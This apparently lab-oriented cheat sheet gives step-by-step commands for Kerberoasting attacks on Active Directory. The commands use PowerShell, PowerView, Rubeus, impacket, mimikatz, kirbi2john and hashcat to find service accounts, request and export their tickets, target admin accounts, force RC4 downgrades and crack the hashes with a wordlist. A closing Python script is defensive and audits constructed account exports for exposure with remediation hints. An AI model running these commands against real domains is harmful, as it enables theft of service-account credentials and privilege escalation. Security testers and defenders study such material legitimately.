Kerberoasting

Identify


Windows AD Module in powershell

Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
Using Powerview
Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalName
Living off the land
setspn.exe -Q */*
Using Rubeus
.\Rubeus.exe kerberoast /stats
Linux
impacket-GetUserSPNs -dc-ip <dcip> domain.local/username
ldapsearch -x -b "DC=certified,DC=htb" -s sub "(&(objectClass=user)(servicePrincipalName=*))" -H ldap://10.129.229.25 | grep -i samaccountname: | cut -f 2 -d " "

Exploit


Make sure your time is synced with the remote host (Kerberos rejects requests outside its allowed clock skew).

sudo timedatectl set-ntp off
sudo rdate -n <targetDC>
From Linux
impacket-GetUserSPNs -dc-ip <dcip> domain.local/username -request
impacket-GetUserSPNs -dc-ip <dcip> domain.local/username -request-user
You can also add -outputfile <name> to write the hashes to a file.
nxc ldap <IP> -u 'user' -p '' --kerberoasting <OUTFILE>

Crack hash

hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
From Windows - Semi-manual approach

setspn.exe -Q */*
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.domain.local:1433"
mimikatz # base64 /out:true
mimikatz # kerberos::list /export  
echo "<base64 blob>" | tr -d '\n' > encoded_file
cat encoded_file | base64 -d > sqldev.kirbi
python2.7 kirbi2john.py sqldev.kirbi

This creates a file called crack_file. The hash then has to be modified slightly before Hashcat accepts it.

sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat

Crack the file

hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt

Note

If we decide to skip the base64 output with Mimikatz and type mimikatz # kerberos::list /export, the .kirbi file (or files) will be written to disk. In this case, we can download the file(s) and run kirbi2john.py against them directly, skipping the base64 decoding step.

PowerView

Import-Module .\PowerView.ps1
Get-DomainUser * -spn | select samaccountname
Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat
Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\ilfreight_tgs.csv -NoTypeInformation
Rubeus: list info about kerberoastable accounts
.\Rubeus.exe kerberoast /stats
Target admin accounts
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap
Use TGT delegation to force an RC4 downgrade of the tickets (does not work on Windows Server 2019 or later)
.\Rubeus.exe kerberoast /tgtdeleg /nowrap
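The enumeration in the Identify section and the admincount / RC4 downgrade options above describe exactly what makes a service account attractive: a user object with an SPN, RC4 still allowed, membership in a privileged group, and a password that has not been rotated. The following Python script is an added example, not code from the original page or from any of the tools it lists: it takes exported account attributes and scores each Kerberoastable account against those properties, with a remediation hint per finding. The account records are constructed; the attribute names match the AD schema, while the 365-day rotation threshold, the severity rules and the assumption that an unset msDS-SupportedEncryptionTypes falls back to RC4 are the author's own for the demo.

```python
"""Audit exported AD account attributes for Kerberoasting exposure."""
from datetime import datetime, timedelta, timezone

# Bit flags of msDS-SupportedEncryptionTypes (MS-KILE).
DES_CBC_CRC, DES_CBC_MD5, RC4_HMAC, AES128, AES256 = 0x01, 0x02, 0x04, 0x08, 0x10
WEAK_ETYPES = DES_CBC_CRC | DES_CBC_MD5 | RC4_HMAC
UAC_ACCOUNTDISABLE = 0x0002

UTC = timezone.utc
NOW = datetime(2024, 5, 1, tzinfo=UTC)   # fixed reference time so the demo is reproducible
STALE_AFTER = timedelta(days=365)        # assumed rotation policy for service account passwords

REMEDIATION = {
    "rc4_or_des_allowed": "set msDS-SupportedEncryptionTypes to AES only (0x18) and reset the password so an AES key exists",
    "privileged_adminCount": "remove the account from privileged groups or replace it with a gMSA",
    "password_older_than_365d": "rotate to a long random password or migrate to a gMSA (automatic 120-day rotation)",
}


def _acct(name, cls, spns, etypes, admin, pwd_set, uac=0x10200):
    """Build one account record using AD attribute names."""
    return {"sAMAccountName": name, "objectClass": cls, "servicePrincipalName": spns,
            "msDS-SupportedEncryptionTypes": etypes, "adminCount": admin,
            "pwdLastSet": pwd_set, "userAccountControl": uac}


# Constructed sample export, not real directory data.
SAMPLE_ACCOUNTS = [
    _acct("svc_sql", "user", ["MSSQLSvc/DEV-PRE-SQL.domain.local:1433"], None, 1, datetime(2019, 1, 10, tzinfo=UTC)),
    _acct("svc_web", "user", ["HTTP/web01.domain.local"], AES128 | AES256, 0, datetime(2024, 3, 1, tzinfo=UTC)),
    _acct("svc_old", "user", ["ftp/old.domain.local"], RC4_HMAC, 0, datetime(2018, 6, 1, tzinfo=UTC), uac=0x10202),  # disabled
    _acct("gmsa_backup$", "msDS-GroupManagedServiceAccount", ["backup/bk01.domain.local"], AES128 | AES256, 0,
          datetime(2024, 4, 20, tzinfo=UTC)),
    _acct("FS01$", "computer", ["cifs/FS01.domain.local"], RC4_HMAC | AES128 | AES256, 0, datetime(2024, 4, 1, tzinfo=UTC)),
    _acct("jdoe", "user", [], None, 0, datetime(2024, 2, 1, tzinfo=UTC)),
]


def allows_weak_etype(etypes):
    """Unset or 0 is treated as RC4 available (assumption: default KDC behaviour for user accounts)."""
    return not etypes or bool(etypes & WEAK_ETYPES)


def is_kerberoastable(acct):
    """Enabled user objects with at least one SPN; computer accounts and gMSAs are excluded."""
    return (acct["objectClass"] == "user"
            and bool(acct["servicePrincipalName"])
            and not acct["userAccountControl"] & UAC_ACCOUNTDISABLE)


def audit_account(acct, now=NOW):
    """Return the findings, a severity and remediation hints for one account."""
    findings = []
    if allows_weak_etype(acct["msDS-SupportedEncryptionTypes"]):
        findings.append("rc4_or_des_allowed")
    if acct["adminCount"] == 1:
        findings.append("privileged_adminCount")
    if now - acct["pwdLastSet"] > STALE_AFTER:
        findings.append("password_older_than_365d")

    if "privileged_adminCount" in findings or len(findings) >= 2:
        severity = "high"
    elif findings:
        severity = "medium"
    else:
        severity = "low"
    return {"account": acct["sAMAccountName"], "spns": acct["servicePrincipalName"],
            "findings": findings, "severity": severity,
            "remediation": [REMEDIATION[f] for f in findings]}


def audit(accounts, now=NOW):
    """Audit only the accounts an attacker could actually request tickets for."""
    return [audit_account(a, now) for a in accounts if is_kerberoastable(a)]


if __name__ == "__main__":
    for result in audit(SAMPLE_ACCOUNTS):
        print(f"{result['account']}: {result['severity']} {result['findings']}")
        for hint in result["remediation"]:
            print("   ->", hint)
```

The same attribute set can be pulled from a real domain with the Get-ADUser command from the Identify section by adding msDS-SupportedEncryptionTypes, adminCount, pwdLastSet and userAccountControl to -Properties; the script only assumes the export is a list of dictionaries keyed by those attribute names.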